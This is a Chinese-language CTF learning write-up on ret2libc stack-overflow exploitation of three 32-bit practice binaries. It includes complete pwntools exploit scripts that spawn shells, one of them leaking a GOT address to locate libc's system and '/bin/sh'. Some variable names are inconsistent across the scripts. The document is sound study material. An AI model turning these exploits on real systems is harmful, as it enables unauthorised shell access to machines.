学习ret2libc手法记录

ret2libc原理（动态编译）

ret2libc 即控制函数的执行 libc 中的函数，通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下，我们会选择执行 system("/bin/sh")，故而此时我们需要知道 system 函数的地址。

ret2libc1

老规矩拿道题的第一步检查保护机制和多少位程序：（checksec ret2libc）

NX保护/32位程序

用IDA打开找到main函数F5查看伪代码

看到了gets函数可能存在栈溢出漏洞

发现了system的地址

system地址0x8048460

shift+f12看看有没有/bin/sh

/bin/sh地址0x8048720

思路大概就有了，通过溢出，跳转到到system函数执行”/bin/sh”拿shell。这里我们需要注意函数调用栈的结构，如果是正常调用 system 函数，我们调用的时候会有一个对应的返回地址，这里以填入任意字节比如'aaaa' 作为虚假的地址，其后参数对应的参数内容。

最后计算一下偏移量（112）

偏移量为112

exp如下

from pwn import*

p = process("./ret2libc1")

#r = remote('ip',port)

bin_sh = 0x8048720

sys_addr = 0x8048460

payload = 'a'*112 + p32(sys_addr) + p32(0x1) + p32(bin_sh)

p.sendline(payload)

p.interactive()

ret2libc2

ret2libc2和ret2libc1的区别在于没有了 "/bin/sh" 字符串，需要通过 gets 函数写到一个可读可写的地方，通常会找 bss 段，然后去执行 /bin/sh

查看保护机制和多少位程序（checksec ret2libc2）

NX/32位

NX保护32位扔进IDA

sys_addr=0x8048490/get_addr=0x8048460

可能存在栈溢出也有system地址 shift+F12看一眼有没有/bin/sh

没有/bin/sh字串，所以需要我们自己需要通过gets把它写入.bss段，然后作为参数给system

找一下bass段的地址

readelf -S ret2libc2 | grep bss

bss_addr=0x804A040

再用vmmap检测一下bass段权限

gdb -q ret2libc2

start

vmmap

具有可读可写可执行权限

通过查找，可以找到的数据如下：

sys_addr=0x8048490

bss_addr=0x804A040

get_addr=0x8048460

在计算偏移量为（112）

exp1如下

from pwn import*

p = process("./ret2libc2")

#r = remote('ip',port)

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

payload = 'a'*112 + p32 (get_addr) + p32(sys_addr) +p32(bss_addr) + p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh')

p.interactive()

exp1栈结构

exp2如下

from pwn import*

p = process("./ret2libc2")

sys_addr=0x8048490

get_addr=0x8048460

bss_addr=0x804A040

pop_ret = 0x0804843d

payload = ''

payload += 'a'*112

payload += p32(gets_addr)

payload += p32(pop_ret)

payload += p32(bss_addr)

payload += p32(sys_addr)

payload += 'a'*4

payload += p32(bss_addr)

p.sendline(payload)

p.sendline('/bin/sh\')

p.interactive()

#寻找pop_ret:ROPgadget –binary ret2libc2 –only ‘pop|ret’| grep ‘ebx’

exp2栈布局

ret2libc3手法

动态编译的程序中真实地址=偏移地址+基地址，不同版本的libc库，其偏移不同，我们我们可以通过libc库版本去寻找每个函数的偏移，泄露已知函数的真实地址去计算其基地址，从而构造出system的函数的真实地址。

ret2libc3和ret2libc2和ret2libc1的区别在于没有 system 也没有 /bin/sh，需要使用 libc 中的 system 和 /bin/sh，知道了libc中的一个函数的地址就可以确定该程序利用的 libc，从而知道其他函数的地址。获得 libc 的某个函数的地址通常采用的方法是：通过 got 表泄露，但是由于libc的延迟绑定，需要泄露的是已经执行过的函数的地址

拿到题先查看一下保护机制

NX/32位

扔进ida观察

没有看到system

可能存在栈溢出

shift+f12看一眼有没有/bin/sh字符串

并没有/bin/sh

既然存在栈溢出就确定偏移量

偏移量为140

思路如下

通过第一次溢出，通过将 puts 的 PLT 地址放到返回处，泄漏出执行过的函数的 GOT 地址（实际上 write 的就可以）

将 write 的返回地址设置为 _start 函数（main () 函数是用户代码的入口，是对用户而言的；而_start () 函数是系统代码的入口，是程序真正的入口），方便再次用来执行 system('/bin/sh')

通过泄露的函数的 GOT 地址计算出 libc 中的 system 和 /bin/sh 的地址

再次通过溢出将返回地址覆盖成泄露出来的 system 的地址 getshell

exp如下

from pwn import *

from LibcSearcher import *

#导入LibcSearch模块

r = remote('111.198.29.45',51596)

elf = ELF('./level3')

write_plt = elf.plt['write']

#要利用的函数

write_got = elf.got['write']

#要泄露的函数的GOT地址，里面的内容即真实地址

main_addr = elf.symbols['main']

#返回地址为main，使其还可溢出

payload = 'a'*140+p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)r.recv()r.sendline(payload)write_addr = u32(r.recv()[:4])

#发送payload后会接收到write的真实地址

libc = LibcSearcher('write',write_addr)

#利用LibcSearcher寻找libc版本

base = write_addr - libc.dump('write')

#.dump为偏移地址

sys_addr = base + libc.dump('system')

sh_addr = base +libc.dump('str_bin_sh')

payload2 = 'a'*140 +p32(sys_addr)+'b'*4+p32(sh_addr)

r.recv()

r.sendline(payload2)

r.interactive()

知识补充：

动态编译与静态编译

1、动态编译的可执行文件需要附带一个的动态链接库（libc库），在执行时，需要调用其对应动态链接库中的命令。所以其优点一方面是缩小了执行文件本身的体积，另一方面是加快了编译速度，节省了系统资源。缺点一是哪怕是很简单的程序，只用到了链接库中的一两条命令，也需要附带一个相对庞大的链接库；二是如果其他计算机上没有安装对应的运行库，则用动态编译的可执行文件就不能运行。

2、静态编译就是编译器在编译可执行文件的时候，将可执行文件需要调用的对应动态链接库(.so)中的部分提取出来，链接到可执行文件中去，使可执行文件在运行的时候不依赖于动态链接库。所以其优缺点与动态编译的可执行文件正好互补。

GOT表和PLT表

在目前的 C 程序中，libc中的函数都是通过 GOT 表来跳转的。通过PLT表作为中间表链接call命令和got表，而got表中的内容是函数的真实地址。在一些pwn题中，要泄漏出的函数地址应该是got表中的内容，为了泄漏这些真正的地址，往往会用到read，write，put等函数，通过已知同时存在于got和libc的函数地址，可以得出偏移量，接着就能通过偏移量找到system函数的真正地址，从而进行ret2libc操作.

摘自某大佬博客

推荐其他的师傅wp：

ATFWUS

YeeZi_

西杭

ret2libc3

此篇文章如果存在问题，还望大佬批评指正